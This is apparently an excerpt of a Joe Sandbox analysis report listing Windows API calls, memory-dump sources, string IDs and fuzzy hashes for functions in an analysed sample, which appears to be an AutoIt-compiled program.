                    • SetFileAttributesW.KERNEL32(?,?), ref: 00CDF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF291
                    • FindClose.KERNEL32(00000000), ref: 00CDF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CDF2B8
                    • _wcscmp.LIBCMT ref: 00CDF2DF
                    • _wcscmp.LIBCMT ref: 00CDF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDF308
                    • SetCurrentDirectoryW.KERNEL32(00D2A5A0), ref: 00CDF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDF330
                    • FindClose.KERNEL32(00000000), ref: 00CDF33D
                    • FindClose.KERNEL32(00000000), ref: 00CDF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: b150e804854592407e6d98c7128df2a85ae508974a4eec195c548c3850a12e5d
                    • Instruction ID: ab111c85ad73870485975aeeca36dcfde1299eb82e63d15a9db075cb33ebc9a2
                    • Opcode Fuzzy Hash: b150e804854592407e6d98c7128df2a85ae508974a4eec195c548c3850a12e5d
                    • Instruction Fuzzy Hash: 7A31A6765002196BDB10DBB4DC89BEE77ACEF08360F1441BEEA15D32A0DB30DB46CA65
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CFF910,00000000,?,00000000,?,?), ref: 00CF0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00CF103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 8a3e8b11ba5737a17796a9a5d9f71a4ccc06ba08fc0837dd1a47d9ab9bd95f82
                    • Instruction ID: ed0e2005b00b23ae2e8730b92172bdb384c5755e311e7eab9e83633a714bc9f1
                    • Opcode Fuzzy Hash: 8a3e8b11ba5737a17796a9a5d9f71a4ccc06ba08fc0837dd1a47d9ab9bd95f82
                    • Instruction Fuzzy Hash: 81027D752006519FCB14EF14C885E2ABBE5FF88724F14885DF99A9B362CB30ED41DB82
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • DragQueryPoint.SHELL32(?,?), ref: 00CFC917
                      • Part of subcall function 00CFADF1: ClientToScreen.USER32(?,?), ref: 00CFAE1A
                      • Part of subcall function 00CFADF1: GetWindowRect.USER32(?,?), ref: 00CFAE90
                      • Part of subcall function 00CFADF1: PtInRect.USER32(?,?,00CFC304), ref: 00CFAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFC9AE
                    • _wcscat.LIBCMT ref: 00CFC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFCA47
                    • DragFinish.SHELL32(?), ref: 00CFCA4E
                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00CFCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2166380349-3440237614
                    • Opcode ID: ff0161a084b2ebeecf23458a623b2e82229e3329f572682d706feadd98b9efea
                    • Instruction ID: 554dd426872afbef13c47809c7fc1465dc9a3ac62e3b22e6242f8bb960b7354c
                    • Opcode Fuzzy Hash: ff0161a084b2ebeecf23458a623b2e82229e3329f572682d706feadd98b9efea
                    • Instruction Fuzzy Hash: A5616D71508304AFC711DF64DC85EAFBBF8EF88750F00492EF695921A1DB709A49DB62
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00CDF37E
                    • _wcscmp.LIBCMT ref: 00CDF393
                    • _wcscmp.LIBCMT ref: 00CDF3AA
                      • Part of subcall function 00CD45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF3D9
                    • FindClose.KERNEL32(00000000), ref: 00CDF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CDF400
                    • _wcscmp.LIBCMT ref: 00CDF427
                    • _wcscmp.LIBCMT ref: 00CDF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDF450
                    • SetCurrentDirectoryW.KERNEL32(00D2A5A0), ref: 00CDF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDF478
                    • FindClose.KERNEL32(00000000), ref: 00CDF485
                    • FindClose.KERNEL32(00000000), ref: 00CDF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: f8a8263ea079d4883d35780075facdb3d50685f8c852d1fabe0b652f972e3808
                    • Instruction ID: bf3d0c147caa51b5d914334f04774170d157cd60d02a090c0b47866f41154c77
                    • Opcode Fuzzy Hash: f8a8263ea079d4883d35780075facdb3d50685f8c852d1fabe0b652f972e3808
                    • Instruction Fuzzy Hash: 9D31D77550111D6FCF10ABA4EC88BEF77ACEF09324F1401BAEA11A32A0D730DB46DA65
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFC4EC
                    • GetFocus.USER32 ref: 00CFC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00CFC507
                    • _memset.LIBCMT ref: 00CFC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CFC65D
                    • GetMenuItemCount.USER32(?), ref: 00CFC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00CFC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CFC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CFC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFC744
                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00CFC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                    • String ID: 0
                    • API String ID: 3616455698-4108050209
                    • Opcode ID: 95b4360eab7bf4d4f18473abdbf10eeaf3ad19d8c0d7863203dd16df34e02c9c
                    • Instruction ID: 6e49f8e4d4d62004e2a8147ce36f2c9aa263dd94cb5ee9453c691c3eaf8b4598
                    • Opcode Fuzzy Hash: 95b4360eab7bf4d4f18473abdbf10eeaf3ad19d8c0d7863203dd16df34e02c9c
                    • Instruction Fuzzy Hash: 02818C70208349AFD750DF14CAC4A7ABBE4EF88354F00492EFAA5D7291D770DA05DBA2
                    APIs
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                      • Part of subcall function 00CC874A: GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                      • Part of subcall function 00CC874A: GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                      • Part of subcall function 00CC874A: RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                      • Part of subcall function 00CC87E7: GetProcessHeap.KERNEL32(00000008,00CC8240,00000000,00000000,?,00CC8240,?), ref: 00CC87F3
                      • Part of subcall function 00CC87E7: RtlAllocateHeap.NTDLL(00000000,?,00CC8240), ref: 00CC87FA
                      • Part of subcall function 00CC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CC8240,?), ref: 00CC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CC825B
                    • _memset.LIBCMT ref: 00CC8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CC828F
                    • GetLengthSid.ADVAPI32(?), ref: 00CC82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CC82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CC82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00CC8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CC8325
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CC834D
                    • CopySid.ADVAPI32(00000000), ref: 00CC8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CC8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CC83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CC83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 086888be7abfba494f809ecb32150f0342f90a0a55287fde08bb145a1419c49c
                    • Instruction ID: d4cff8bfd1641fa71490f52e4fe8e0677742f8d24423f758aa404c5a5491c266
                    • Opcode Fuzzy Hash: 086888be7abfba494f809ecb32150f0342f90a0a55287fde08bb145a1419c49c
                    • Instruction Fuzzy Hash: F6612C71A00249BBDF109F94DC84FAEBB79FF04700F14826DF825A72A1DB319A09DB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                    • API String ID: 0-4052911093
                    • Opcode ID: c5b373d4d162b3e8bc29b89b141f256d4967b2b540d0e095656bab759ad5af0d
                    • Instruction ID: 5c766b8313f539a04c20f37fbc23ec290cb036247c5d54bd1797ee61ba64493a
                    • Opcode Fuzzy Hash: c5b373d4d162b3e8bc29b89b141f256d4967b2b540d0e095656bab759ad5af0d
                    • Instruction Fuzzy Hash: F072B171E00219DBDB14DF5AC880BAEB7B5FF49314F14806AE819EB381DB309E81DB94
                    APIs
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0737
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CF07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CF0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: d8d0cabdf86e11f009ccfbea95db5419af490e8abec965749ccc56bb95fa024e
                    • Instruction ID: 63f3c2cad20b7decf942a8f967800d0ea3a55a53165a9513ac18c044fd4102ab
                    • Opcode Fuzzy Hash: d8d0cabdf86e11f009ccfbea95db5419af490e8abec965749ccc56bb95fa024e
                    • Instruction Fuzzy Hash: ADE15C31204304AFCB54DF25C885E2ABBE9EF89714B14856DF95ADB2A2DB30ED01DB52
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00CD0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00CD02C2
                    • GetKeyState.USER32(000000A0), ref: 00CD02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00CD02F7
                    • GetKeyState.USER32(000000A1), ref: 00CD030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00CD0324
                    • GetKeyState.USER32(00000011), ref: 00CD0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00CD034E
                    • GetKeyState.USER32(00000012), ref: 00CD0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00CD0378
                    • GetKeyState.USER32(0000005B), ref: 00CD038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 6e760020e88896aaae90347eb20ee73f9aace96241485b21dd63b5fee905caad
                    • Instruction ID: 2a5ad6a2b845b2817598e2f405c999cb5f10cbbf5b7a47cffcd00c7d6fc37124
                    • Opcode Fuzzy Hash: 6e760020e88896aaae90347eb20ee73f9aace96241485b21dd63b5fee905caad
                    • Instruction Fuzzy Hash: D541A9245057C96EFF319A6888483B9BEA0AF11340F68409FD7D6477D2E7D49BC8C7A2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 7cc3d873a9d9d4a134740d55a066b3e5fa06c312961c83842887caccc161e804
                    • Instruction ID: fb5d2c28a1ca483fbf078c9ffb0f3b010abdadb28ceb12aed14df15b85e61a67
                    • Opcode Fuzzy Hash: 7cc3d873a9d9d4a134740d55a066b3e5fa06c312961c83842887caccc161e804
                    • Instruction Fuzzy Hash: 6A217F35301211AFDB14AF65EC49B7E77A8EF44721F10C02AF94ADB2A1CB74AD01DB5A
                    APIs
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                      • Part of subcall function 00CD4CD3: GetFileAttributesW.KERNEL32(?,00CD3947), ref: 00CD4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CD3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CD3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00CD3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CD3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CD3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 7674ffe4cc754295ab75fec1d932e99ebe103806d52c51e0fac9f61d980f2eaa
                    • Instruction ID: 30ed32279cf854d0d256d1129a97df7d67361d78c90f46e1c0b71dfcb15681cc
                    • Opcode Fuzzy Hash: 7674ffe4cc754295ab75fec1d932e99ebe103806d52c51e0fac9f61d980f2eaa
                    • Instruction Fuzzy Hash: ED51703180114CABCF15EBA0CD929FDB7B8AF14300F6481AAE55677191DF716F09EBA1
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CDF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00CDF6DB
                    • _wcscmp.LIBCMT ref: 00CDF6EF
                    • _wcscmp.LIBCMT ref: 00CDF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00CDF7A8
                    • FindClose.KERNEL32(00000000), ref: 00CDF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 197f7f95c9d6c869a494ab8befcfc5a47f87a4003396bbb53d90b5010ee5b45f
                    • Instruction ID: eda302fd187def0d968cc2a2e9da1c17a152ba53cbe53f13a01d3d01b1e34377
                    • Opcode Fuzzy Hash: 197f7f95c9d6c869a494ab8befcfc5a47f87a4003396bbb53d90b5010ee5b45f
                    • Instruction Fuzzy Hash: E641607190021A9FCF11DF64CC89AEEBBB4FF05310F14456AE929A62A1DB309F46DB90
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetSystemMetrics.USER32(0000000F), ref: 00CFD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00CFD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CFD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CFDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CFDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00CFDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CFDA68
                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00CFDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                    • String ID:
                    • API String ID: 830902736-0
                    • Opcode ID: 2de00919f3f298c4bc191614a2b4f412a9a693c81d38e06b2e6f61a241792664
                    • Instruction ID: 89f22d1deed2ca62cb8778ede01a24d2692288dfa1d24e25130115523895c52e
                    • Opcode Fuzzy Hash: 2de00919f3f298c4bc191614a2b4f412a9a693c81d38e06b2e6f61a241792664
                    • Instruction Fuzzy Hash: D7B1BB31500219EBCF54CF68C9C57BD7BB2FF04701F088069EE5A9B295DB30AA50DBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
